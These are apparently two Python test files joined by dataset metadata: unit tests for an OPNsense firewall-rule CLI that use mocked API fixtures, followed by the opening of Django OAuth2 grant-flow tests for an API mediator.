"DDP": {
"value": "DDP",
"selected": 0
},
"IDPR-CMTP": {
"value": "IDPR-CMTP",
"selected": 0
},
"TP++": {
"value": "TP++",
"selected": 0
},
"IL": {
"value": "IL",
"selected": 0
},
"IPV6": {
"value": "IPV6",
"selected": 0
},
"SDRP": {
"value": "SDRP",
"selected": 0
},
"IDRP": {
"value": "IDRP",
"selected": 0
},
"RSVP": {
"value": "RSVP",
"selected": 0
},
"GRE": {
"value": "GRE",
"selected": 0
},
"DSR": {
"value": "DSR",
"selected": 0
},
"BNA": {
"value": "BNA",
"selected": 0
},
"ESP": {
"value": "ESP",
"selected": 0
},
"AH": {
"value": "AH",
"selected": 0
},
"I-NLSP": {
"value": "I-NLSP",
"selected": 0
},
"SWIPE": {
"value": "SWIPE",
"selected": 0
},
"NARP": {
"value": "NARP",
"selected": 0
},
"MOBILE": {
"value": "MOBILE",
"selected": 0
},
"TLSP": {
"value": "TLSP",
"selected": 0
},
"SKIP": {
"value": "SKIP",
"selected": 0
},
"IPV6-ICMP": {
"value": "IPV6-ICMP",
"selected": 0
},
"CFTP": {
"value": "CFTP",
"selected": 0
},
"SAT-EXPAK": {
"value": "SAT-EXPAK",
"selected": 0
},
"KRYPTOLAN": {
"value": "KRYPTOLAN",
"selected": 0
},
"RVD": {
"value": "RVD",
"selected": 0
},
"IPPC": {
"value": "IPPC",
"selected": 0
},
"SAT-MON": {
"value": "SAT-MON",
"selected": 0
},
"VISA": {
"value": "VISA",
"selected": 0
},
"IPCV": {
"value": "IPCV",
"selected": 0
},
"CPNX": {
"value": "CPNX",
"selected": 0
},
"CPHB": {
"value": "CPHB",
"selected": 0
},
"WSN": {
"value": "WSN",
"selected": 0
},
"PVP": {
"value": "PVP",
"selected": 0
},
"BR-SAT-MON": {
"value": "BR-SAT-MON",
"selected": 0
},
"SUN-ND": {
"value": "SUN-ND",
"selected": 0
},
"WB-MON": {
"value": "WB-MON",
"selected": 0
},
"WB-EXPAK": {
"value": "WB-EXPAK",
"selected": 0
},
"ISO-IP": {
"value": "ISO-IP",
"selected": 0
},
"VMTP": {
"value": "VMTP",
"selected": 0
},
"SECURE-VMTP": {
"value": "SECURE-VMTP",
"selected": 0
},
"VINES": {
"value": "VINES",
"selected": 0
},
"TTP": {
"value": "TTP",
"selected": 0
},
"NSFNET-IGP": {
"value": "NSFNET-IGP",
"selected": 0
},
"DGP": {
"value": "DGP",
"selected": 0
},
"TCF": {
"value": "TCF",
"selected": 0
},
"EIGRP": {
"value": "EIGRP",
"selected": 0
},
"OSPF": {
"value": "OSPF",
"selected": 0
},
"SPRITE-RPC": {
"value": "SPRITE-RPC",
"selected": 0
},
"LARP": {
"value": "LARP",
"selected": 0
},
"MTP": {
"value": "MTP",
"selected": 0
},
"AX.25": {
"value": "AX.25",
"selected": 0
},
"IPIP": {
"value": "IPIP",
"selected": 0
},
"MICP": {
"value": "MICP",
"selected": 0
},
"SCC-SP": {
"value": "SCC-SP",
"selected": 0
},
"ETHERIP": {
"value": "ETHERIP",
"selected": 0
},
"ENCAP": {
"value": "ENCAP",
"selected": 0
},
"GMTP": {
"value": "GMTP",
"selected": 0
},
"IFMP": {
"value": "IFMP",
"selected": 0
},
"PNNI": {
"value": "PNNI",
"selected": 0
},
"PIM": {
"value": "PIM",
"selected": 0
},
"ARIS": {
"value": "ARIS",
"selected": 0
},
"SCPS": {
"value": "SCPS",
"selected": 0
},
"QNX": {
"value": "QNX",
"selected": 0
},
"A/N": {
"value": "A/N",
"selected": 0
},
"IPCOMP": {
"value": "IPCOMP",
"selected": 0
},
"SNP": {
"value": "SNP",
"selected": 0
},
"COMPAQ-PEER": {
"value": "COMPAQ-PEER",
"selected": 0
},
"IPX-IN-IP": {
"value": "IPX-IN-IP",
"selected": 0
},
"CARP": {
"value": "CARP",
"selected": 0
},
"PGM": {
"value": "PGM",
"selected": 0
},
"L2TP": {
"value": "L2TP",
"selected": 0
},
"DDX": {
"value": "DDX",
"selected": 0
},
"IATP": {
"value": "IATP",
"selected": 0
},
"STP": {
"value": "STP",
"selected": 0
},
"SRP": {
"value": "SRP",
"selected": 0
},
"UTI": {
"value": "UTI",
"selected": 0
},
"SMP": {
"value": "SMP",
"selected": 0
},
"SM": {
"value": "SM",
"selected": 0
},
"PTP": {
"value": "PTP",
"selected": 0
},
"ISIS": {
"value": "ISIS",
"selected": 0
},
"CRTP": {
"value": "CRTP",
"selected": 0
},
"CRUDP": {
"value": "CRUDP",
"selected": 0
},
"SPS": {
"value": "SPS",
"selected": 0
},
"PIPE": {
"value": "PIPE",
"selected": 0
},
"SCTP": {
"value": "SCTP",
"selected": 0
},
"FC": {
"value": "FC",
"selected": 0
},
"RSVP-E2E-IGNORE": {
"value": "RSVP-E2E-IGNORE",
"selected": 0
},
"UDPLITE": {
"value": "UDPLITE",
"selected": 0
},
"MPLS-IN-IP": {
"value": "MPLS-IN-IP",
"selected": 0
},
"MANET": {
"value": "MANET",
"selected": 0
},
"HIP": {
"value": "HIP",
"selected": 0
},
"SHIM6": {
"value": "SHIM6",
"selected": 0
},
"WESP": {
"value": "WESP",
"selected": 0
},
"ROHC": {
"value": "ROHC",
"selected": 0
},
"PFSYNC": {
"value": "PFSYNC",
"selected": 0
},
"DIVERT": {
"value": "DIVERT",
"selected": 0
}
},
"source_net": "my_alias",
"source_not": "0",
"source_port": "",
"destination_net": "my_alias",
"destination_not": "0",
"destination_port": "http",
"gateway": {
"": {
"value": "none",
"selected": True
},
"Null4": {
"value": "Null4 - 127.0.0.1",
"selected": 0
},
"Null6": {
"value": "Null6 - ::1",
"selected": 0
},
"WAN_DHCP": {
"value": "WAN_DHCP - 10.0.2.2",
"selected": 0
},
"WAN_DHCP6": {
"value": "WAN_DHCP6 - inet6",
"selected": 0
}
},
"log": "0",
"description": "test Rule with alias"
},
"39d68aa9-b7cd-40ab-b4c3-1c1c36a3a367": {
"enabled": "1",
"sequence": "10",
"action": {
"pass": {
"value": "Pass",
"selected": 1
},
"block": {
"value": "Block",
"selected": 0
},
"reject": {
"value": "Reject",
"selected": 0
}
},
"quick": "1",
"interface": {
"lan": {
"value": "LAN",
"selected": 1
},
"lo0": {
"value": "Loopback",
"selected": 0
},
"wan": {
"value": "WAN",
"selected": 0
}
},
"direction": {
"in": {
"value": "In",
"selected": 1
},
"out": {
"value": "Out",
"selected": 0
}
},
"ipprotocol": {
"inet": {
"value": "IPv4",
"selected": 1
},
"inet6": {
"value": "IPv6",
"selected": 0
}
},
"protocol": {
"any": {
"value": "any",
"selected": 0
},
"ICMP": {
"value": "ICMP",
"selected": 0
},
"IGMP": {
"value": "IGMP",
"selected": 0
},
"GGP": {
"value": "GGP",
"selected": 0
},
"IPENCAP": {
"value": "IPENCAP",
"selected": 0
},
"ST2": {
"value": "ST2",
"selected": 0
},
"TCP": {
"value": "TCP",
"selected": 1
},
"CBT": {
"value": "CBT",
"selected": 0
},
"EGP": {
"value": "EGP",
"selected": 0
},
"IGP": {
"value": "IGP",
"selected": 0
},
"BBN-RCC": {
"value": "BBN-RCC",
"selected": 0
},
"NVP": {
"value": "NVP",
"selected": 0
},
"PUP": {
"value": "PUP",
"selected": 0
},
"ARGUS": {
"value": "ARGUS",
"selected": 0
},
"EMCON": {
"value": "EMCON",
"selected": 0
},
"XNET": {
"value": "XNET",
"selected": 0
},
"CHAOS": {
"value": "CHAOS",
"selected": 0
},
"UDP": {
"value": "UDP",
"selected": 0
},
"MUX": {
"value": "MUX",
"selected": 0
},
"DCN": {
"value": "DCN",
"selected": 0
},
"HMP": {
"value": "HMP",
"selected": 0
},
"PRM": {
"value": "PRM",
"selected": 0
},
"XNS-IDP": {
"value": "XNS-IDP",
"selected": 0
},
"TRUNK-1": {
"value": "TRUNK-1",
"selected": 0
},
"TRUNK-2": {
"value": "TRUNK-2",
"selected": 0
},
"LEAF-1": {
"value": "LEAF-1",
"selected": 0
},
"LEAF-2": {
"value": "LEAF-2",
"selected": 0
},
"RDP": {
"value": "RDP",
"selected": 0
},
"IRTP": {
"value": "IRTP",
"selected": 0
},
"ISO-TP4": {
"value": "ISO-TP4",
"selected": 0
},
"NETBLT": {
"value": "NETBLT",
"selected": 0
},
"MFE-NSP": {
"value": "MFE-NSP",
"selected": 0
},
"MERIT-INP": {
"value": "MERIT-INP",
"selected": 0
},
"DCCP": {
"value": "DCCP",
"selected": 0
},
"3PC": {
"value": "3PC",
"selected": 0
},
"IDPR": {
"value": "IDPR",
"selected": 0
},
"XTP": {
"value": "XTP",
"selected": 0
},
"DDP": {
"value": "DDP",
"selected": 0
},
"IDPR-CMTP": {
"value": "IDPR-CMTP",
"selected": 0
},
"TP++": {
"value": "TP++",
"selected": 0
},
"IL": {
"value": "IL",
"selected": 0
},
"IPV6": {
"value": "IPV6",
"selected": 0
},
"SDRP": {
"value": "SDRP",
"selected": 0
},
"IDRP": {
"value": "IDRP",
"selected": 0
},
"RSVP": {
"value": "RSVP",
"selected": 0
},
"GRE": {
"value": "GRE",
"selected": 0
},
"DSR": {
"value": "DSR",
"selected": 0
},
"BNA": {
"value": "BNA",
"selected": 0
},
"ESP": {
"value": "ESP",
"selected": 0
},
"AH": {
"value": "AH",
"selected": 0
},
"I-NLSP": {
"value": "I-NLSP",
"selected": 0
},
"SWIPE": {
"value": "SWIPE",
"selected": 0
},
"NARP": {
"value": "NARP",
"selected": 0
},
"MOBILE": {
"value": "MOBILE",
"selected": 0
},
"TLSP": {
"value": "TLSP",
"selected": 0
},
"SKIP": {
"value": "SKIP",
"selected": 0
},
"IPV6-ICMP": {
"value": "IPV6-ICMP",
"selected": 0
},
"CFTP": {
"value": "CFTP",
"selected": 0
},
"SAT-EXPAK": {
"value": "SAT-EXPAK",
"selected": 0
},
"KRYPTOLAN": {
"value": "KRYPTOLAN",
"selected": 0
},
"RVD": {
"value": "RVD",
"selected": 0
},
"IPPC": {
"value": "IPPC",
"selected": 0
},
"SAT-MON": {
"value": "SAT-MON",
"selected": 0
},
"VISA": {
"value": "VISA",
"selected": 0
},
"IPCV": {
"value": "IPCV",
"selected": 0
},
"CPNX": {
"value": "CPNX",
"selected": 0
},
"CPHB": {
"value": "CPHB",
"selected": 0
},
"WSN": {
"value": "WSN",
"selected": 0
},
"PVP": {
"value": "PVP",
"selected": 0
},
"BR-SAT-MON": {
"value": "BR-SAT-MON",
"selected": 0
},
"SUN-ND": {
"value": "SUN-ND",
"selected": 0
},
"WB-MON": {
"value": "WB-MON",
"selected": 0
},
"WB-EXPAK": {
"value": "WB-EXPAK",
"selected": 0
},
"ISO-IP": {
"value": "ISO-IP",
"selected": 0
},
"VMTP": {
"value": "VMTP",
"selected": 0
},
"SECURE-VMTP": {
"value": "SECURE-VMTP",
"selected": 0
},
"VINES": {
"value": "VINES",
"selected": 0
},
"TTP": {
"value": "TTP",
"selected": 0
},
"NSFNET-IGP": {
"value": "NSFNET-IGP",
"selected": 0
},
"DGP": {
"value": "DGP",
"selected": 0
},
"TCF": {
"value": "TCF",
"selected": 0
},
"EIGRP": {
"value": "EIGRP",
"selected": 0
},
"OSPF": {
"value": "OSPF",
"selected": 0
},
"SPRITE-RPC": {
"value": "SPRITE-RPC",
"selected": 0
},
"LARP": {
"value": "LARP",
"selected": 0
},
"MTP": {
"value": "MTP",
"selected": 0
},
"AX.25": {
"value": "AX.25",
"selected": 0
},
"IPIP": {
"value": "IPIP",
"selected": 0
},
"MICP": {
"value": "MICP",
"selected": 0
},
"SCC-SP": {
"value": "SCC-SP",
"selected": 0
},
"ETHERIP": {
"value": "ETHERIP",
"selected": 0
},
"ENCAP": {
"value": "ENCAP",
"selected": 0
},
"GMTP": {
"value": "GMTP",
"selected": 0
},
"IFMP": {
"value": "IFMP",
"selected": 0
},
"PNNI": {
"value": "PNNI",
"selected": 0
},
"PIM": {
"value": "PIM",
"selected": 0
},
"ARIS": {
"value": "ARIS",
"selected": 0
},
"SCPS": {
"value": "SCPS",
"selected": 0
},
"QNX": {
"value": "QNX",
"selected": 0
},
"A/N": {
"value": "A/N",
"selected": 0
},
"IPCOMP": {
"value": "IPCOMP",
"selected": 0
},
"SNP": {
"value": "SNP",
"selected": 0
},
"COMPAQ-PEER": {
"value": "COMPAQ-PEER",
"selected": 0
},
"IPX-IN-IP": {
"value": "IPX-IN-IP",
"selected": 0
},
"CARP": {
"value": "CARP",
"selected": 0
},
"PGM": {
"value": "PGM",
"selected": 0
},
"L2TP": {
"value": "L2TP",
"selected": 0
},
"DDX": {
"value": "DDX",
"selected": 0
},
"IATP": {
"value": "IATP",
"selected": 0
},
"STP": {
"value": "STP",
"selected": 0
},
"SRP": {
"value": "SRP",
"selected": 0
},
"UTI": {
"value": "UTI",
"selected": 0
},
"SMP": {
"value": "SMP",
"selected": 0
},
"SM": {
"value": "SM",
"selected": 0
},
"PTP": {
"value": "PTP",
"selected": 0
},
"ISIS": {
"value": "ISIS",
"selected": 0
},
"CRTP": {
"value": "CRTP",
"selected": 0
},
"CRUDP": {
"value": "CRUDP",
"selected": 0
},
"SPS": {
"value": "SPS",
"selected": 0
},
"PIPE": {
"value": "PIPE",
"selected": 0
},
"SCTP": {
"value": "SCTP",
"selected": 0
},
"FC": {
"value": "FC",
"selected": 0
},
"RSVP-E2E-IGNORE": {
"value": "RSVP-E2E-IGNORE",
"selected": 0
},
"UDPLITE": {
"value": "UDPLITE",
"selected": 0
},
"MPLS-IN-IP": {
"value": "MPLS-IN-IP",
"selected": 0
},
"MANET": {
"value": "MANET",
"selected": 0
},
"HIP": {
"value": "HIP",
"selected": 0
},
"SHIM6": {
"value": "SHIM6",
"selected": 0
},
"WESP": {
"value": "WESP",
"selected": 0
},
"ROHC": {
"value": "ROHC",
"selected": 0
},
"PFSYNC": {
"value": "PFSYNC",
"selected": 0
},
"DIVERT": {
"value": "DIVERT",
"selected": 0
}
},
"source_net": "192.168.1.0/24",
"source_not": "0",
"source_port": "",
"destination_net": "10.0.0.0/24",
"destination_not": "0",
"destination_port": "ftp",
"gateway": {
"": {
"value": "none",
"selected": True
},
"Null4": {
"value": "Null4 - 127.0.0.1",
"selected": 0
},
"Null6": {
"value": "Null6 - ::1",
"selected": 0
},
"WAN_DHCP": {
"value": "WAN_DHCP - 10.0.2.2",
"selected": 0
},
"WAN_DHCP6": {
"value": "WAN_DHCP6 - inet6",
"selected": 0
}
},
"log": "0",
"description": "Pass rule"
}
}
},
"snatrules": {
"rule": []
}
}
}
self._api_client_args_fixtures = [
'api_key',
'api_secret',
'https://127.0.0.1/api',
True,
'~/.opn-cli/ca.pem',
60
]
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_list(self, api_response_mock: Mock):
columns = (
'sequence,interface,action,direction,ipprotocol,protocol,'
'source_net,source_port,destination_net,destination_port'
)
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_list,
],
rule,
['list', '-c', columns, '-o', 'plain']
)
self.assertIn(
(
"1 lan pass in inet TCP 10.0.0.0/24 80 192.168.0.0/24 http\n"
"5 lan pass in inet TCP my_alias my_alias http\n"
"10 lan pass in inet TCP 192.168.1.0/24 10.0.0.0/24 ftp\n"
),
result.output
)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_show_NOT_FOUND(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
[]
],
rule,
['show', 'b468c719-89db-45a8-bd02-b081246dc002']
)
self.assertIn("", result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_show_EMPTY_STRING(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[],
rule,
['show', '']
)
self.assertIn("", result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_show(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
{
"rule":
self._api_data_fixtures_list['filter']['rules']['rule']['b468c719-89db-45a8-bd02-b081246dc002']
},
],
rule,
['show', 'b468c719-89db-45a8-bd02-b081246dc002', '-o', 'yaml']
)
self.assertIn(
(
"sequence: '1'\n"
"action: pass\n"
"quick: '1'\n"
"interface: lan\n"
"direction: in\n"
"ipprotocol: inet\n"
"protocol: TCP\n"
"source_net: 10.0.0.0/24\n"
"source_not: '0'\n"
"source_port: '80'\n"
"destination_net: 192.168.0.0/24\n"
"destination_not: '0'\n"
"destination_port: http\n"
"gateway: ''\n"
"log: '0'\n"
"description: test Rule astuerz\n"
"enabled: '1'\n\n"
),
result.output
)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_create_OK(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_create_OK,
self._api_data_fixtures_apply_OK,
self._api_data_fixtures_cancel_rollback_OK,
],
rule,
[
"create", "20",
"-a", "block",
"--no-quick",
"-i", "lan,wan",
"-d", "in",
"-ip", "inet",
"-p", "TCP",
"-src", "20.82.65.183",
"--no-source-invert",
"-src-port", "8081",
"-dst", "192.168.1.1",
"--no-destination-invert",
"-dst-port", "https",
"--gateway", "Null4",
"--log",
"-d", "example block rule",
"--disabled",
]
)
self.assertIn(
(
"saved \n"
),
result.output
)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_create_ERROR(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_create_ERROR,
self._api_data_fixtures_apply_OK,
self._api_data_fixtures_cancel_rollback_OK,
],
rule,
[
"create", "40",
"-a", "pass",
"-i", "lan",
"-src", "alias_not_exists",
"-dst", "192.168.1.1",
"-d", "example fails",
]
)
self.assertIn(
(
"Error: {'result': 'failed', "
"'validations': {'rule.source_net': 'alias_not_exists is not a valid source IP address or alias.'}}\n"
),
result.output
)
self.assertEqual(1, result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_update_OK(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_update_OK,
self._api_data_fixtures_apply_OK,
self._api_data_fixtures_cancel_rollback_OK,
],
rule,
[
"update", "85282721-934c-42be-ba4d-a93cbfda26af",
"-s", "7",
"-a", "pass",
"--quick",
"-i", "lan",
"-d", "out",
"-ip", "inet",
"-p", "TCP",
"-src", "example_alias",
"--source-invert",
"-src-port", "",
"-dst", "20.82.65.183",
"--destination-invert",
"-dst-port", "ssh",
"--gateway", "",
"--no-log",
"-d", "example pass rule",
"--enabled",
]
)
self.assertIn(
(
"saved \n"
),
result.output
)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_update_NOT_EXISTS(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_update_NOT_EXISTS,
],
rule,
[
"update", "85282721-934c-42be-ba4d-a93cbfda26af",
"--disabled",
]
)
self.assertIn(
(
"Error: {'result': 'failed'}\n"
),
result.output
)
self.assertEqual(1, result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_delete_OK(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_delete_OK,
self._api_data_fixtures_apply_OK,
self._api_data_fixtures_cancel_rollback_OK,
],
rule,
[
"delete", "85282721-934c-42be-ba4d-a93cbfda26af",
]
)
self.assertIn(
(
"deleted \n"
),
result.output
)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_delete_NOT_FOUND(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_delete_NOT_FOUND,
],
rule,
[
"delete", "not_existing_rule",
]
)
self.assertIn("Error: {'result': 'not found'}\n", result.output)
self.assertEqual(1, result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_start_transaction_FAILED(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_FAILED,
],
rule,
[
"delete", "85282721-934c-42be-ba4d-a93cbfda26af",
],
True
)
self.assertIn("Error: Savepoint creation failed: {'status': 'failed'}\n", result.output)
self.assertEqual(1, result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_commit_transaction_apply_FAILED(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_delete_OK,
self._api_data_fixtures_apply_FAILED
],
rule,
[
"delete", "85282721-934c-42be-ba4d-a93cbfda26af",
],
True
)
self.assertIn("Error: firewall rule apply failed: {'status': 'FAILED\\n\\n'}\n", result.output)
self.assertEqual(1, result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_commit_transaction_cancel_rollback_FAILED(self, api_response_mock: Mock):
result = self._opn_cli_command_result(
api_response_mock,
[
self._api_data_fixtures_savepoint_OK,
self._api_data_fixtures_delete_OK,
self._api_data_fixtures_apply_OK,
self._api_data_fixtures_cancel_rollback_FAILED
],
rule,
[
"delete", "85282721-934c-42be-ba4d-a93cbfda26af",
],
True
)
self.assertIn(
(
"Error: firewall rule cancel rollback failed. "
"Rollback configuration after 60 seconds: {'status': 'failed\\n\\n'}\n"
),
result.output
)
self.assertEqual(1, result.exit_code)
| 43.110112
| 119
| 0.178795
| 3,794
| 95,920
| 4.403532
| 0.08408
| 0.227869
| 0.028311
| 0.048902
| 0.915006
| 0.902376
| 0.884719
| 0.858742
| 0.853534
| 0.848866
| 0
| 0.040326
| 0.731391
| 95,920
| 2,224
| 120
| 43.129496
| 0.608112
| 0
| 0
| 0.683971
| 0
| 0.001366
| 0.144256
| 0.014408
| 0
| 0
| 0
| 0
| 0.008652
| 1
| 0.006375
| false
| 0.006375
| 0.001366
| 0
| 0.008197
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
35cca9fb7eafb1a9ef2343d233045c57da8e2297
| 18,433
|
py
|
Python
|
api/tests.py
|
Xavier-Cliquennois/ac-mediator
|
ce55b65ab7f4532fc11fbb2f994518c60240bfdc
|
[
"Apache-2.0"
] | 9
|
2016-11-17T08:04:01.000Z
|
2020-09-10T05:58:36.000Z
|
api/tests.py
|
Xavier-Cliquennois/ac-mediator
|
ce55b65ab7f4532fc11fbb2f994518c60240bfdc
|
[
"Apache-2.0"
] | 23
|
2016-10-26T14:43:55.000Z
|
2021-06-10T20:02:38.000Z
|
api/tests.py
|
Xavier-Cliquennois/ac-mediator
|
ce55b65ab7f4532fc11fbb2f994518c60240bfdc
|
[
"Apache-2.0"
] | 3
|
2018-03-03T12:07:28.000Z
|
2020-08-02T12:54:31.000Z
|
from django.test import TestCase, override_settings
from api.models import ApiClient
from accounts.models import Account
from django.core.urlresolvers import reverse
from services import management
from django.conf import settings
import oauth2_provider
import datetime
class OAuth2TestCase(TestCase):
def setUp(self):
# Create users
self.dev_user = Account.objects.create_user('dev', password='devpass')
self.end_user_password = 'endpass'
self.end_user = Account.objects.create_user('end', password=self.end_user_password)
# Create clients
ApiClient.objects.create(
name='PublicImplicitClient',
user=self.dev_user,
agree_tos=True,
client_type=ApiClient.CLIENT_PUBLIC,
authorization_grant_type=ApiClient.GRANT_IMPLICIT,
redirect_uris='http://example.com',
password_grant_is_allowed=False,
)
ApiClient.objects.create(
name='PublicPasswordClient',
user=self.dev_user,
agree_tos=True,
client_type=ApiClient.CLIENT_PUBLIC,
authorization_grant_type=ApiClient.GRANT_PASSWORD,
redirect_uris='',
password_grant_is_allowed=False, # Start at not allowed
)
ApiClient.objects.create(
name='ConfidentialAuthorizationCodeClient',
user=self.dev_user,
agree_tos=True,
client_type=ApiClient.CLIENT_CONFIDENTIAL,
authorization_grant_type=ApiClient.GRANT_AUTHORIZATION_CODE,
redirect_uris='http://example.com',
password_grant_is_allowed=False,
)
@staticmethod
def get_params_from_url(url):
params_part = url.split('?')[1]
return {item.split('=')[0]: item.split('=')[1] for item in params_part.split('&')}
@staticmethod
def fragment_params_from_url(url):
params_part = url.split('#')[1]
return {item.split('=')[0]: item.split('=')[1] for item in params_part.split('&')}
def check_dict_has_fields(self, dictionary, fields):
for field in fields:
self.assertIn(field, dictionary)
def check_access_token_response_fields(self, resp):
self.check_dict_has_fields(
resp.json(), ['expires_in', 'scope', 'refresh_token', 'access_token', 'token_type'])
def check_redirect_uri_access_token_frag_params(self, params):
self.check_dict_has_fields(
params, ['expires_in', 'scope', 'access_token', 'token_type'])
def test_password_grant_flow(self):
# Return 'unauthorized_client' when trying password grant with a client of other authorization_grant_type
client = ApiClient.objects.get(name='PublicImplicitClient')
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'grant_type': 'password',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.json()['error'], 'unauthorized_client')
# Return 'unauthorized_client' when trying password grant with a client with authorization_grant_type
# set to 'password' but with 'password_grant_is_allowed' set to False
client = ApiClient.objects.get(name='PublicPasswordClient')
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'grant_type': 'password',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.json()['error'], 'unauthorized_client')
# Return 200 OK when trying password grant with a client with authorization_grant_type
# set to 'password' and with 'password_grant_is_allowed' set to True
client.password_grant_is_allowed = True
client.save()
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'grant_type': 'password',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 200)
self.check_access_token_response_fields(resp)
# Return 'invalid_client' when missing client_id
resp = self.client.post(
reverse('oauth2_provider:token'),
{
#'client_id': client.client_id,
'grant_type': 'password',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.json()['error'], 'invalid_client')
# Return 'invalid_client' when client_id does not exist in db
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': 'thi5i5aninv3nt3dcli3ntid',
'grant_type': 'password',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.json()['error'], 'invalid_client')
# Return 'unsupported_grant_type' when grant type does not exist
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'grant_type': 'invented_grant',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.json()['error'], 'unsupported_grant_type')
# Return 'invalid_request' when no username is provided
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'grant_type': 'password',
#'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.json()['error'], 'invalid_request')
# Return 'invalid_request' when no password is provided
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'grant_type': 'password',
'username': self.end_user.username,
#'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.json()['error'], 'invalid_request')
# Test get token with trailing slash (https://github.com/AudioCommons/ac-mediator/issues/19)
# NOTE: since change in b11a0197bbecbbdb6e5f3c82285f6b749596947d reverse() will return URLs
# without trailing slashes, therefore here we complement the test by adding the slash
resp = self.client.post(
reverse('oauth2_provider:token') + '/',
{
'client_id': client.client_id,
'grant_type': 'password',
'username': self.end_user.username,
'password': self.end_user_password,
})
self.assertEqual(resp.status_code, 200)
def test_implicit_grant_flow(self):
# Redirect to login page when visiting authorize page with an AnonymousUser
client = ApiClient.objects.get(name='PublicImplicitClient')
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'token',
})
self.assertIn('/login/', resp.url)
# Redirect includes 'error' param when using non existing response type
self.client.login(username=self.end_user.username, password=self.end_user_password)
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'non_existing_response_type',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.check_dict_has_fields(resp_params, ['error'])
self.assertEqual(resp_params['error'], 'unsupported_response_type')
# Redirect includes 'error' param when using non supported response type
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.check_dict_has_fields(resp_params, ['error'])
self.assertEqual(resp_params['error'], 'unauthorized_client')
# Authorization page is displayed with errors with non existing client_id
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': 'thi5i5aninv3nt3dcli3ntid',
'response_type': 'code',
})
self.assertEqual(resp.status_code, 400)
self.assertIn('Invalid client_id parameter value', str(resp.content))
# Authorization page is displayed correctly when correct response_type and client_id
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'token',
})
self.assertEqual(resp.status_code, 200)
self.assertIn('name="allow" value="Authorize"', str(resp.content))
# Final redirect includes token params
resp = self.client.post(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'token',
'redirect_uri': client.default_redirect_uri,
